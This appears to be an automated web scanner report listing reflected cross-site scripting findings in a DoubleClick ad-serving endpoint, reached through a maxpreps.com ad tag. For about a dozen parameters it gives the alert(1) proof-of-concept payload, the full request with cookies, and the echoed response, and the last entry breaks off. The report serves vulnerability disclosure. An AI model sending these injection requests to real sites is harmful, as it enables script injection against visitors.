<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Fri Apr 22 18:09:39 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... eclick.net/click%3Bh%3Dv8/3af6/17/142/%2a/i%3B240368710%3B0-0%3B0%3B62889286%3B4307-300/250%3B41857116/41874903/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=645e0fe"-alert(1)-"ff95fe7b18f&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011. ...[SNIP]...
The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4cb3e"-alert(1)-"bf402c0c0eb was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5865.149883.CBS_SPORTS/B5436755.8;sz=300x250;click0=http://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=4cb3e"-alert(1)-"bf402c0c0eb&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/;ord=2011.04.27.23.37.03? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.maxpreps.com/national/national.htm User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Fri Apr 22 18:09:39 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 2a/i%3B240368710%3B0-0%3B0%3B62889286%3B4307-300/250%3B41857116/41874903/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=4cb3e"-alert(1)-"bf402c0c0eb&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/http://www.face ...[SNIP]...
The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff6c8"-alert(1)-"8a8c3547842 was submitted in the count parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5865.149883.CBS_SPORTS/B5436755.8;sz=300x250;click0=http://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=ff6c8"-alert(1)-"8a8c3547842&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/;ord=2011.04.27.23.37.03? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.maxpreps.com/national/national.htm User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Fri Apr 22 18:09:39 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... g=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=ff6c8"-alert(1)-"8a8c3547842&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/http://www.facebook.com/adidasfootballus?sk=app_173775342656692"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; va ...[SNIP]...
The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce02e"-alert(1)-"c18d7645fa was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5865.149883.CBS_SPORTS/B5436755.8;sz=300x250;click0=http://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=ce02e"-alert(1)-"c18d7645fa&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/;ord=2011.04.27.23.37.03? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.maxpreps.com/national/national.htm User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Fri Apr 22 18:09:39 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=ce02e"-alert(1)-"c18d7645fa&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/http://www.facebook.com/adidasfootballus?sk=app_173775342656692"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaqu ...[SNIP]...
The value of the e request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1267d"-alert(1)-"12cea1025ac was submitted in the e parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5865.149883.CBS_SPORTS/B5436755.8;sz=300x250;click0=http://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=1267d"-alert(1)-"12cea1025ac&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/;ord=2011.04.27.23.37.03? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.maxpreps.com/national/national.htm User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Fri Apr 22 18:09:39 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 368710%3B0-0%3B0%3B62889286%3B4307-300/250%3B41857116/41874903/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=1267d"-alert(1)-"12cea1025ac&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/http://www.facebook.com/a ...[SNIP]...
The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd0f1"-alert(1)-"dab6fa02c58 was submitted in the epartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5865.149883.CBS_SPORTS/B5436755.8;sz=300x250;click0=http://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=dd0f1"-alert(1)-"dab6fa02c58&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/;ord=2011.04.27.23.37.03? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.maxpreps.com/national/national.htm User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Fri Apr 22 18:09:39 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=dd0f1"-alert(1)-"dab6fa02c58&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/http://www.facebook.com/adidasfootballus?sk=app_173775342656692"); var fscUrl = url; var fscUr ...[SNIP]...
The value of the event request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27dc1"-alert(1)-"792d2569e8e was submitted in the event parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5865.149883.CBS_SPORTS/B5436755.8;sz=300x250;click0=http://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=27dc1"-alert(1)-"792d2569e8e HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.maxpreps.com/national/national.htm User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Fri Apr 22 18:09:39 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=27dc1"-alert(1)-"792d2569e8ehttp://www.facebook.com/adidasfootballus?sk=app_173775342656692"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ef25"-alert(1)-"e7c4b8c6009 was submitted in the h parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5865.149883.CBS_SPORTS/B5436755.8;sz=300x250;click0=http://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn2ef25"-alert(1)-"e7c4b8c6009&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/;ord=2011.04.27.23.37.03? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.maxpreps.com/national/national.htm User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Fri Apr 22 18:09:39 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... /ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/142/%2a/i%3B240368710%3B0-0%3B0%3B62889286%3B4307-300/250%3B41857116/41874903/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn2ef25"-alert(1)-"e7c4b8c6009&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg ...[SNIP]...
The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 32a82"-alert(1)-"74f415d259d was submitted in the l parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5865.149883.CBS_SPORTS/B5436755.8;sz=300x250;click0=http://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US32a82"-alert(1)-"74f415d259d&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/;ord=2011.04.27.23.37.03? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.maxpreps.com/national/national.htm User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Fri Apr 22 18:09:39 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... et/click%3Bh%3Dv8/3af6/17/142/%2a/i%3B240368710%3B0-0%3B0%3B62889286%3B4307-300/250%3B41857116/41874903/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US32a82"-alert(1)-"74f415d259d&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23 ...[SNIP]...
The value of the nd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2ad4"-alert(1)-"5295ce4effe was submitted in the nd parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5865.149883.CBS_SPORTS/B5436755.8;sz=300x250;click0=http://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=e2ad4"-alert(1)-"5295ce4effe&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/;ord=2011.04.27.23.37.03? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.maxpreps.com/national/national.htm User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Fri Apr 22 18:09:39 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 6/17/142/%2a/i%3B240368710%3B0-0%3B0%3B62889286%3B4307-300/250%3B41857116/41874903/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=e2ad4"-alert(1)-"5295ce4effe&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/http: ...[SNIP]...
The value of the o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8c42"-alert(1)-"ed79a83044f was submitted in the o parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5865.149883.CBS_SPORTS/B5436755.8;sz=300x250;click0=http://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253ac8c42"-alert(1)-"ed79a83044f&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/;ord=2011.04.27.23.37.03? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.maxpreps.com/national/national.htm User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Fri Apr 22 18:09:39 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... ttp://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/142/%2a/i%3B240368710%3B0-0%3B0%3B62889286%3B4307-300/250%3B41857116/41874903/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253ac8c42"-alert(1)-"ed79a83044f&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.2 ...[SNIP]...
The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 824d1"-alert(1)-"7dcf3885d8a was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5865.149883.CBS_SPORTS/B5436755.8;sz=300x250;click0=http://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=824d1"-alert(1)-"7dcf3885d8a&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/;ord=2011.04.27.23.37.03? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.maxpreps.com/national/national.htm User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Fri Apr 22 18:09:39 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 3/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=824d1"-alert(1)-"7dcf3885d8a&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/http://www.facebook.com/adidasfootballus?sk=app_173775342656692"); var fscUrl = url; ...[SNIP]...
The value of the orh request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e59bb"-alert(1)-"748ff10e818 was submitted in the orh parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
